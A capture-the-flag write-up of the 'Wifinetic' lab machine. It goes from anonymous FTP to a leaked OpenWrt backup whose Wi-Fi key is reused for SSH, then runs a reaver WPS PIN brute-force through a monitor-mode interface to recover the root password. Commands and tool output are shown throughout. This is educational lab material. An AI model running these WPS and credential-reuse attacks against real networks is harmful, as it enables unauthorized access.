Wifinetic
Wifi Box!
Gaining Access
Nmap scan:
$ nmap -p- --min-rate 3000 10.129.68.239
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-16 18:57 +08
Nmap scan report for 10.129.68.239
Host is up (0.020s latency).
Not shown: 52717 closed tcp ports (conn-refused), 12815 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domainFTP is open, so we should check for anonymous access.
Anonymous FTP -> Wifi Password -> SSH
There were quite a few files within this FTP server:
$ ftp 10.129.68.239
Connected to 10.129.68.239.
220 (vsFTPd 3.0.3)
Name (10.129.68.239:kali): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||44452|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 4434 Jul 31 11:03 MigrateOpenWrt.txt
-rw-r--r-- 1 ftp ftp 2501210 Jul 31 11:03 ProjectGreatMigration.pdf
-rw-r--r-- 1 ftp ftp 60857 Jul 31 11:03 ProjectOpenWRT.pdf
-rw-r--r-- 1 ftp ftp 40960 Sep 11 15:25 backup-OpenWrt-2023-07-26.tar
-rw-r--r-- 1 ftp ftp 52946 Jul 31 11:03 employees_wellness.pdfThe most interesting is the .tar file that contained a backup of some sorts. When we download this and extract the files, it shows that this is the /etc/ file:
$ tar -xf backup-OpenWrt-2023-07-26.tar
$ cd etc
$ ls
config group inittab nftables.d passwd rc.local shinit uhttpd.crt
dropbear hosts luci-uploads opkg profile shells sysctl.conf uhttpd.keyWithin the /etc/config file, there was a wireless file. Since this was a Wifi themed box, I read the file and found a password:
$ cat wireless
config wifi-device 'radio0'
option type 'mac80211'
option path 'virtual/mac80211_hwsim/hwsim0'
option cell_density '0'
option channel 'auto'
option band '2g'
option txpower '20'
config wifi-device 'radio1'
option type 'mac80211'
option path 'virtual/mac80211_hwsim/hwsim1'
option channel '36'
option band '5g'
option htmode 'HE80'
option cell_density '0'
config wifi-iface 'wifinet0'
option device 'radio0'
option mode 'ap'
option ssid 'OpenWrt'
option encryption 'psk'
option key 'VeRyUniUqWiFIPasswrd1!'
option wps_pushbutton '1'
config wifi-iface 'wifinet1'
option device 'radio1'
option mode 'sta'
option network 'wwan'
option ssid 'OpenWrt'
option encryption 'psk'
option key 'VeRyUniUqWiFIPasswrd1!'The question now is whether the box is transmitting stuff over the air, or if there's a user that uses this password. Reading the passwd file shows us a few users:
root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
ntp:x:123:123:ntp:/var/run/ntp:/bin/false
dnsmasq:x:453:453:dnsmasq:/var/run/dnsmasq:/bin/false
logd:x:514:514:logd:/var/run/logd:/bin/false
ubus:x:81:81:ubus:/var/run/ubus:/bin/false
netadmin:x:999:999::/home/netadmin:/bin/falseThe netadmin user reused it:
Privilege Escalation
Enumeration
Since this is a Wifi box, we can check ifconfig for the interfaces available:
netadmin@wifinetic:/opt/share$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.129.68.239 netmask 255.255.0.0 broadcast 10.129.255.255
inet6 fe80::250:56ff:feb9:501e prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:501e prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:50:1e txqueuelen 1000 (Ethernet)
RX packets 199994 bytes 14812436 (14.8 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 199850 bytes 10858403 (10.8 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 862 bytes 53092 (53.0 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 862 bytes 53092 (53.0 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
mon0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
unspec 02-00-00-00-02-00-30-3A-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC)
RX packets 6865 bytes 1209922 (1.2 MB)
RX errors 0 dropped 6865 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.1 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::ff:fe00:0 prefixlen 64 scopeid 0x20<link>
ether 02:00:00:00:00:00 txqueuelen 1000 (Ethernet)
RX packets 229 bytes 21998 (21.9 KB)
RX errors 0 dropped 31 overruns 0 frame 0
TX packets 288 bytes 33715 (33.7 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.23 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::ff:fe00:100 prefixlen 64 scopeid 0x20<link>
ether 02:00:00:00:01:00 txqueuelen 1000 (Ethernet)
RX packets 82 bytes 10771 (10.7 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 229 bytes 26120 (26.1 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan2: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether 02:00:00:00:02:00 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0There's a mon0 interface listening, and checking iwconfig shows that it is in Monitor mode:
netadmin@wifinetic:/opt/share$ iwconfig
wlan2 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
eth0 no wireless extensions.
wlan1 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
lo no wireless extensions.
wlan0 IEEE 802.11 Mode:Master Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
hwsim0 no wireless extensions.
mon0 IEEE 802.11 Mode:Monitor Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:onInteresting. There wasn't much else I could do, so I ran linpeas.sh to enumerate for me, and it found reaver, a program I wasn't familiar with:
Files with capabilities:
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/reaver = cap_net_raw+epThis tool can be used to brute force Wifi passwords out. Using this tool, combined with our Monitor mode mon0 interface, we can start sniffing stuff from wlan0 and wlan1. We can grab the ether value and feed it into reaver:
netadmin@wifinetic:/tmp$ reaver -i mon0 -b 02:00:00:00:00:00 -v
Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from 02:00:00:00:00:00
[+] Received beacon from 02:00:00:00:00:00
[+] Trying pin "12345670"
[!] Found packet with bad FCS, skipping...
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] WPS PIN: '12345670'
[+] WPA PSK: 'WhatIsRealAnDWhAtIsNot51121!'
[+] AP SSID: 'OpenWrt'Afterwards, we can su to root:
Last updated